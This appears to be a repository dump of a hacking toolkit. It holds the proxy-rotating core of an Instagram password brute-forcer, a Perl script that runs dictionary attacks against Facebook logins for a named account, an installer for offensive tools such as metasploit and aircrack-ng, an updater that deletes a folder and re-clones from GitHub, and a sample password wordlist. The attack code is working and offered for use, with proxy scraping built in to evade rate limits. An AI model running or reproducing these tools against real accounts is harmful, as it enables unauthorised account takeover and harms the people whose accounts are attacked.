| @property 29 | def list_size(self): 30 | return len(self.passlist) 31 | 32 | def list_add(self, password): 33 | if not password in self.passlist: 34 | self.passlist.append(password) 35 | 36 | def list_remove(self, password): 37 | if password in self.passlist: 38 | self.attempts += 1 39 | self.passlist.pop(self.passlist.index(password)) 40 | self.session.write(self.attempts, self.passlist) 41 | 42 | def count_lines(self): 43 | lines = 0 44 | 45 | fingerprint = sha256( 46 | self.username.lower().strip().encode() 47 | ).hexdigest().encode() 48 | 49 | self.display.info('Reading wordlist ...') 50 | 51 | with open(self.passlist_path, 'rb') as f: 52 | 53 | for data in f: 54 | lines += 1 55 | chunk = sha256(data).hexdigest().encode() 56 | fingerprint = sha256(fingerprint + chunk).hexdigest().encode() 57 | 58 | self.fingerprint = fingerprint 59 | self.session = Session(self.fingerprint) 60 | 61 | return lines + 1 62 | 63 | def read(self): 64 | attempts = 0 65 | with open(self.passlist_path, 'rt', encoding='utf-8') as passlist: 66 | 67 | for password in passlist: 68 | if not self.is_alive: 69 | break 70 | 71 | if self.resume: 72 | self.attempts, self.passlist = self.session.read() 73 | 74 | if attempts < (self.attempts + self.list_size): 75 | attempts += 1 76 | continue 77 | else: 78 | self.resume = False 79 | 80 | password = password.replace('\n', '').replace( 81 | '\r', '').replace('\t', '') 82 | 83 | if self.list_size < self.max_passwords: 84 | self.list_add(password) 85 | else: 86 | while self.list_size >= self.max_passwords and self.is_alive: 87 | sleep(0.5) 88 | 89 | if self.is_alive: 90 | self.list_add(password) 91 | self.session.write(self.attempts, self.passlist) 92 | 93 | if self.is_alive: 94 | self.is_read = True 95 | 96 | @property 97 | def attempts(self): 98 | return self.passwords_removed 99 | 100 | @attempts.setter 101 | def attempts(self, n): 102 | self.passwords_removed = n 103 | 104 | def start(self): 105 | self.read() 106 | 107 | def stop(self): 108 | self.is_alive = False 109 | -------------------------------------------------------------------------------- /files/Instagram/lib/proxy.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Proxy 4 | 5 | 6 | class Proxy(object): 7 | 8 | def __init__(self, proxy): 9 | self.proxy = proxy 10 | 11 | @property 12 | def ip(self): 13 | return self.proxy['ip'] 14 | 15 | @property 16 | def port(self): 17 | return self.proxy['port'] 18 | 19 | @property 20 | def country(self): 21 | return self.proxy['country'] 22 | 23 | @property 24 | def addr(self): 25 | addr = '{}:{}'.format(self.proxy['ip'], self.proxy['port']) 26 | return {'http': addr, 'https': addr} 27 | -------------------------------------------------------------------------------- /files/Instagram/lib/proxy_list.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: A list that will manage proxies 4 | 5 | 6 | class ProxyList(object): 7 | 8 | def __init__(self): 9 | self.list = [] 10 | 11 | def __contains__(self, proxy): 12 | for _proxy in self.list: 13 | if _proxy.ip == proxy['ip'] and _proxy.port == proxy['port']: 14 | return True 15 | return False 16 | 17 | def append(self, proxy): 18 | self.list.append(proxy) -------------------------------------------------------------------------------- /files/Instagram/lib/proxy_manager.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Proxy manager 4 | 5 | from time import sleep 6 | from queue import Queue 7 | from .scraper import Scraper 8 | from .bad_proxies import BadProxies 9 | 10 | 11 | class ProxyManager(object): 12 | 13 | def __init__(self): 14 | self.is_alive = True 15 | self.proxies = Queue() 16 | self.scraper = Scraper() 17 | self.bad_proxies = BadProxies() 18 | 19 | def collect(self): 20 | while self.is_alive: 21 | if not self.proxies.qsize(): 22 | 23 | for proxy in self.scraper.proxies: 24 | if not proxy in self.bad_proxies: 25 | self.proxies.put(proxy) 26 | 27 | sleep(5) 28 | 29 | def bad_proxy(self, proxy): 30 | if not proxy in self.bad_proxies: 31 | self.bad_proxies.append(proxy) 32 | 33 | def get_proxy(self): 34 | if self.proxies.qsize(): 35 | return self.proxies.get() 36 | 37 | def start(self): 38 | self.collect() 39 | 40 | def stop(self): 41 | self.is_alive = False 42 | self.scraper.is_alive = False -------------------------------------------------------------------------------- /files/Instagram/lib/scraper.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Proxy scraper 4 | 5 | from time import sleep 6 | from requests import get 7 | from .proxy import Proxy 8 | from random import randint 9 | from .display import Display 10 | from .proxy_list import ProxyList 11 | from bs4 import BeautifulSoup as bs 12 | from threading import Thread, RLock 13 | from .const import fetch_time, debug 14 | 15 | 16 | class Scraper(object): 17 | 18 | def __init__(self): 19 | self.lock = RLock() 20 | self.is_alive = True 21 | self.display = Display() 22 | self.scraped_proxies = [] 23 | self.extra_proxies_link = 'http://spys.me/proxy.txt' 24 | 25 | self.links = [ 26 | 'https://sslproxies.org', 27 | 'https://free-proxy-list.net', 28 | 'https://free-proxy-list.net/anonymous-proxy.html' 29 | ] 30 | 31 | def parse_extra_proxy(self, proxy): 32 | proxy = proxy.split(' ') 33 | addr = proxy[0].split(':') 34 | 35 | return { 36 | 'ip': addr[0], 37 | 'port': addr[1], 38 | 'country': proxy[1].split('-')[0] 39 | } 40 | 41 | def parse_proxy(self, proxy): 42 | proxy = proxy.find_all('td') 43 | if proxy[4].string != 'transparent' and proxy[5].string != 'transparent': 44 | return { 45 | 'ip': proxy[0].string, 46 | 'port': proxy[1].string, 47 | 'country': proxy[3].string 48 | } 49 | 50 | def scrape_proxies(self, link): 51 | proxies = [] 52 | 53 | try: 54 | proxies = bs(get(link, timeout=fetch_time).text, 55 | 'html.parser').find('tbody').find_all('tr') 56 | except: 57 | pass 58 | 59 | if not proxies: 60 | with self.lock: 61 | if self.is_alive and debug: 62 | self.display.warning( 63 | 'Failed to grab proxies from {}'.format(link)) 64 | 65 | for proxy in proxies: 66 | with self.lock: 67 | _proxy = self.parse_proxy(proxy) 68 | if _proxy: 69 | self.scraped_proxies.append(_proxy) 70 | 71 | def scrape_extra_proxies(self): 72 | proxies = [] 73 | 74 | try: 75 | if self.is_alive: 76 | proxies = get(self.extra_proxies_link, 77 | timeout=fetch_time).text.split('\n') 78 | except: 79 | pass 80 | 81 | if not proxies: 82 | with self.lock: 83 | if self.is_alive and debug: 84 | self.display.warning( 85 | 'Failed to grab proxies from {}'.format(self.extra_proxies_link)) 86 | 87 | for proxy in proxies: 88 | if '-H' in proxy and '-S' in proxy: 89 | with self.lock: 90 | self.scraped_proxies.append(self.parse_extra_proxy(proxy)) 91 | 92 | @property 93 | def proxies(self): 94 | proxy_list = ProxyList() 95 | 96 | threads = [] 97 | threads = [Thread(target=self.scrape_proxies, args=[link]) 98 | for link in self.links] 99 | threads.append(Thread(target=self.scrape_extra_proxies)) 100 | 101 | index = 0 102 | while index < len(threads) and self.is_alive: 103 | thread = threads[index] 104 | 105 | try: 106 | thread.daemon = True 107 | thread.start() 108 | index += 1 109 | except: 110 | sleep(0.5) 111 | 112 | while self.is_alive and len(threads): 113 | for thread in [thread for thread in threads if not thread.is_alive()]: 114 | threads.pop(threads.index(thread)) 115 | sleep(0.5) 116 | 117 | if self.is_alive: 118 | for proxy in self.scraped_proxies: 119 | 120 | if not proxy in proxy_list: 121 | proxy_list.append(Proxy(proxy)) 122 | 123 | return [proxy_list.list.pop(randint(0, len(proxy_list.list)-1)) for _ in range(len(proxy_list.list))] 124 | -------------------------------------------------------------------------------- /files/Instagram/lib/session.py: -------------------------------------------------------------------------------- 1 | # Date: 05/05/2018 2 | # Author: Mohamed 3 | # Description: Session Handler 4 | 5 | import json 6 | import sqlite3 7 | from os import remove 8 | from sys import version_info 9 | from lib.const import db_path 10 | from os.path import exists as path 11 | from csv import DictWriter, DictReader 12 | 13 | 14 | class DatabaseWrapper: 15 | 16 | def __init__(self, db_name): 17 | self.db_name = db_name 18 | 19 | def db_query(self, cmd, args=[], fetchone=True): 20 | database = sqlite3.connect(self.db_name) 21 | sql = database.cursor().execute(cmd, args) 22 | data = sql.fetchone()[0] if fetchone else sql.fetchall() 23 | database.close() 24 | return data 25 | 26 | def db_execute(self, cmd, args=[]): 27 | database = sqlite3.connect(self.db_name) 28 | database.cursor().execute(cmd, args) 29 | database.commit() 30 | database.close() 31 | 32 | 33 | class Session(DatabaseWrapper): 34 | 35 | is_busy = False 36 | 37 | def __init__(self, fingerprint): 38 | super().__init__(db_path) 39 | self.fingerprint = fingerprint 40 | self.create_tables() 41 | 42 | def create_tables(self): 43 | self.db_execute(''' 44 | CREATE TABLE IF NOT EXISTS 45 | Session( 46 | session_id TEXT, 47 | attempts INTEGER, 48 | list TEXT, 49 | 50 | PRIMARY KEY(session_id) 51 | ); 52 | ''') 53 | 54 | @property 55 | def exists(self): 56 | return self.db_query('SELECT COUNT(*) FROM Session WHERE session_id=?;', [self.fingerprint]) 57 | 58 | def read(self): 59 | 60 | if not self.exists: 61 | return 0, [] 62 | 63 | attempts, list = self.db_query(''' 64 | SELECT attempts, list 65 | FROM Session 66 | WHERE session_id=? 67 | ''', args=[self.fingerprint], fetchone=False)[0] 68 | 69 | return attempts, json.loads(list) 70 | 71 | def _write(self, attempts, _list): 72 | 73 | if not self.exists: 74 | self.db_execute(''' 75 | INSERT INTO Session(session_id, attempts, list) 76 | VALUES(?, ?, ?); 77 | ''', args=[self.fingerprint, attempts, json.dumps(_list)]) 78 | return 79 | 80 | self.db_execute(''' 81 | UPDATE Session 82 | SET attempts=?, list=? 83 | WHERE session_id=?; 84 | ''', args=[attempts, json.dumps(_list), self.fingerprint]) 85 | 86 | def write(self, attempts, _list): 87 | if not attempts: 88 | return 89 | 90 | while Session.is_busy: 91 | pass 92 | 93 | try: 94 | Session.is_busy = True 95 | self._write(attempts, _list) 96 | except: 97 | pass 98 | finally: 99 | Session.is_busy = False 100 | 101 | def delete(self): 102 | if self.exists: 103 | self.db_execute(''' 104 | DELETE FROM Session 105 | WHERE session_id=?; 106 | ''', args=[self.fingerprint]) 107 | -------------------------------------------------------------------------------- /files/Instagram/requirements.txt: -------------------------------------------------------------------------------- 1 | bs4 2 | future 3 | requests 4 | colorama 5 | -------------------------------------------------------------------------------- /files/Instagram/test_proxies.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Date: 3/15/2019 3 | Author: Mohamed 4 | Description: Reads a file that contains a list of proxies and determines whether or not that list is good. 5 | Each line in the file must be in the format of ip:port 6 | ''' 7 | 8 | import platform 9 | from os import system 10 | from time import sleep 11 | from requests import Session 12 | from threading import Thread, RLock 13 | 14 | proxy_list = 'proxies.txt' 15 | target_site = 'https://instagram.com' 16 | 17 | 18 | def get_proxies(): 19 | proxies = [] 20 | 21 | with open(proxy_list, 'rt', encoding='utf-8') as proxies_file: 22 | 23 | for line in proxies_file: 24 | if not line: 25 | continue 26 | 27 | ip, port = line.replace('\r', '').split(':') 28 | 29 | port = int(port) 30 | proxy = {'ip': ip, 'port': port} 31 | proxies.append(proxy) 32 | 33 | return proxies 34 | 35 | 36 | class TestProxies: 37 | 38 | def __init__(self, proxies): 39 | self.worked = 0 40 | self.failed = 0 41 | self.lock = RLock() 42 | self.active_brs = 0 43 | self.is_alive = True 44 | self.proxies = proxies 45 | self.total = len(proxies) 46 | self.test_link = target_site 47 | 48 | def display(self): 49 | system('cls' if platform.system() == 'Windows' else 'clear') 50 | worked, failed, total = self.worked, self.failed, self.total 51 | 52 | worked_per = round((worked/total) * 100, 2) 53 | failed_per = round((failed/total) * 100, 2) 54 | complete = round(worked_per + failed_per, 2) 55 | 56 | print(f'Complete: {complete}%') 57 | print(f'Active browsers: {self.active_brs}') 58 | print(f'Proxies worked: {worked_per}% [{worked}]') 59 | print(f'Proxies failed: {failed_per}% [{failed}]') 60 | 61 | def test_proxy(self, proxy): 62 | br = Session() 63 | 64 | addr = '{}:{}'.format(proxy['ip'], proxy['port']) 65 | addr = {'http': addr, 'https': addr} 66 | br.proxies.update(addr) 67 | 68 | try: 69 | br.get(self.test_link, timeout=(10, 15)) 70 | 71 | with self.lock: 72 | self.worked += 1 73 | except: 74 | with self.lock: 75 | self.failed += 1 76 | finally: 77 | br.close() 78 | 79 | if self.is_alive: 80 | with self.lock: 81 | self.display() 82 | 83 | self.active_brs -= 1 84 | 85 | def start(self): 86 | for proxy in self.proxies: 87 | 88 | while self.is_alive and self.active_brs >= 512: 89 | pass 90 | 91 | if not self.is_alive: 92 | break 93 | 94 | with self.lock: 95 | self.active_brs += 1 96 | 97 | Thread(target=self.test_proxy, args=[proxy], daemon=True).start() 98 | 99 | while self.is_alive and self.active_brs: 100 | sleep(0.5) 101 | 102 | self.display() 103 | 104 | def stop(self): 105 | self.is_alive = False 106 | 107 | while self.active_brs: 108 | try: 109 | with self.lock: 110 | self.display() 111 | 112 | sleep(0.5) 113 | except KeyboardInterrupt: 114 | break 115 | 116 | def examine(self): 117 | failed = self.failed / self.total 118 | worked = self.worked / self.total 119 | 120 | if worked == 0: 121 | print('Bad proxy list') 122 | elif (failed - worked) >= 0.1: 123 | print('Bad proxy list') 124 | elif (failed - worked) == 0: 125 | print('Bad proxy list') 126 | else: 127 | print('Good proxy list') 128 | 129 | 130 | if __name__ == '__main__': 131 | test_proxies = TestProxies(get_proxies()) 132 | 133 | try: 134 | test_proxies.start() 135 | except KeyboardInterrupt: 136 | test_proxies.stop() 137 | finally: 138 | test_proxies.examine() 139 | -------------------------------------------------------------------------------- /files/fb-brute.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # Bruteforce-Facebook 4 | # 5 | # Description: 6 | # Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS. 7 | # 8 | # Usage: 9 | # perl Imad'Ox-Bruter.pl login wordlist 10 | # login could be either a user's email address or profile name 11 | # 12 | # Module Requirements: 13 | # 14 | # Install module if missing: 15 | # perl -MCPAN -e 'install Net::SSLeay' 16 | # 17 | # Demo: 18 | # perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst 19 | # 20 | # --- Imad'Ox-Bruter Facebook password cracking tool 21 | # --- By Imad'Ox Hunter 22 | # --- www.facebook.com/imad.elouajib 23 | # 24 | # [+] Cracking Facebooklogin@facebook.com ... 25 | # 26 | # [-] test -> Failed 27 | # [-] test123 -> Failed 28 | # [-] testtest -> Failed 29 | # [-] testest123 -> Failed 30 | # [-] qwerty -> Failed 31 | # [-] azerty -> Failed 32 | # [-] password -> Failed 33 | # [-] password123 -> Failed 34 | # 35 | ######################################################## 36 | # [+] CRACKED! Your password is P@$$W0RD 37 | ######################################################## 38 | # 39 | 40 | use strict; 41 | use Net::SSLeay::Handle; 42 | 43 | if(!defined($ARGV[0] && $ARGV[1])) { 44 | 45 | system('clear'); 46 | print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; 47 | print "+++ Coded by Imad'Ox-Hunter\n"; 48 | print "+++ www.fb.com/imad.elouajib\n\n"; 49 | print "+++ Usage: perl $0 login wordlist\n\n"; 50 | exit; } 51 | 52 | my $user = $ARGV[0]; 53 | my $wordlist = $ARGV[1]; 54 | 55 | open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n"; 56 | 57 | print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; 58 | print "+++ Coded by Imad'Ox-Hunter\n"; 59 | print "+++ www.fb.com/imad.elouajib\n"; 60 | print "\n[+] Now Cracking $user ...\n\n"; 61 | 62 | while (my $password = ) { 63 | chomp ($password); 64 | $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg; 65 | 66 | my $a = "POST /login.php HTTP/1.1"; 67 | my $b = "Host: www.facebook.com"; 68 | my $c = "Connection: close"; 69 | my $e = "Cache-Control: max-age=0"; 70 | my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 71 | my $g = "Origin: https://www.facebook.com"; 72 | my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"; 73 | my $i = "Content-Type: application/x-www-form-urlencoded"; 74 | my $j = "Accept-Encoding: gzip,deflate,sdch"; 75 | my $k = "Accept-Language: en-US,en;q=0.8"; 76 | my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3"; 77 | 78 | my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa"; 79 | my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In"; 80 | my $cl = length($post); 81 | my $d = "Content-Length: $cl"; 82 | 83 | 84 | my ($host, $port) = ("www.facebook.com", 443); 85 | 86 | tie(*SSL, "Net::SSLeay::Handle", $host, $port); 87 | 88 | 89 | print SSL "$a\n"; 90 | print SSL "$b\n"; 91 | print SSL "$c\n"; 92 | print SSL "$d\n"; 93 | print SSL "$e\n"; 94 | print SSL "$f\n"; 95 | print SSL "$g\n"; 96 | print SSL "$h\n"; 97 | print SSL "$i\n"; 98 | print SSL "$j\n"; 99 | print SSL "$k\n"; 100 | print SSL "$l\n"; 101 | print SSL "$cookie\n\n"; 102 | 103 | print SSL "$post\n"; 104 | 105 | my $success; 106 | while(my $result = ){ 107 | if($result =~ /Location(.*?)/){ 108 | $success = $1; 109 | } 110 | } 111 | if (!defined $success) 112 | { 113 | print "[-] Trying -> $password \n"; 114 | close SSL; 115 | } 116 | else 117 | { 118 | print "\n########################################################\n"; 119 | print "[+] Password Cracked => $password \n"; 120 | print "########################################################\n\n"; 121 | close SSL; 122 | exit; 123 | } 124 | } 125 | -------------------------------------------------------------------------------- /htklupdate.py: -------------------------------------------------------------------------------- 1 | import os 2 | print "UPDATING..." 3 | os.system("cd") 4 | os.system('cd /root/ && rm -fr htk-lite && git clone https://github.com/unkn0wnh4ckr/htk-lite && echo "[UPDATED]: Restart Your Terminal"') 5 | -------------------------------------------------------------------------------- /install.py: -------------------------------------------------------------------------------- 1 | import os 2 | def install(): 3 | os.system("apt update") 4 | os.system("apt install dirb -y") 5 | os.system("apt install bettercap -y") 6 | os.system("apt install sslscan -y") 7 | os.system("apt install crunch -y") 8 | os.system("apt install tcpdump -y") 9 | os.system("apt install macchanger -y") 10 | os.system("apt install wafw00f -y") 11 | os.system("apt install medusa -y") 12 | os.system("pip install future") 13 | os.system("pip install mechanize") 14 | os.system("pip install json") 15 | os.system("pip install whois") 16 | os.system("pip install python-whois") 17 | os.system("pip install requests") 18 | os.system("pip install bs4") 19 | os.system("pip install requests[socks]") 20 | os.system("pip install urlparse") 21 | os.system("pip install cookielib") 22 | os.system("pip install scapy") 23 | os.system("pip install datetime") 24 | os.system("pip install argparse") 25 | os.system("pip install re") 26 | os.system("pip install threading") 27 | os.system("pip install urllib2") 28 | os.system("pip install modules") 29 | os.system("pip install builtwith") 30 | os.system("pip install smtplib") 31 | os.system("pip install whois") 32 | os.system("pip install builtwith") 33 | os.system("pip install colorama") 34 | os.system("pip install dnspython") 35 | os.system("pip install shodan") 36 | os.system("apt install python-socks -y") 37 | os.system("apt install nmap -y") 38 | os.system("apt install php -y") 39 | os.system("apt install perl -y") 40 | os.system("apt install neofetch -y") 41 | os.system("apt install cupp -y") 42 | os.system("gem install lolcat") 43 | print "\n" 44 | print """entering big download region prepare you anus 45 | if your not ready press ctrl C """ 46 | i = raw_input("press ctrl c to stop hit enter to continue") 47 | os.system("apt install metasploit-framework -y") 48 | os.system("apt install reaver -y") 49 | os.system("apt install aircrack-ng -y") 50 | 51 | install() 52 | -------------------------------------------------------------------------------- /wordlists/example.txt: -------------------------------------------------------------------------------- 1 | password 2 | 123456 3 | 123 4 | password123 5 | admin 6 | root 7 | toor 8 | username 9 | qwerty 10 | PASSWORD 11 | --------------------------------------------------------------------------------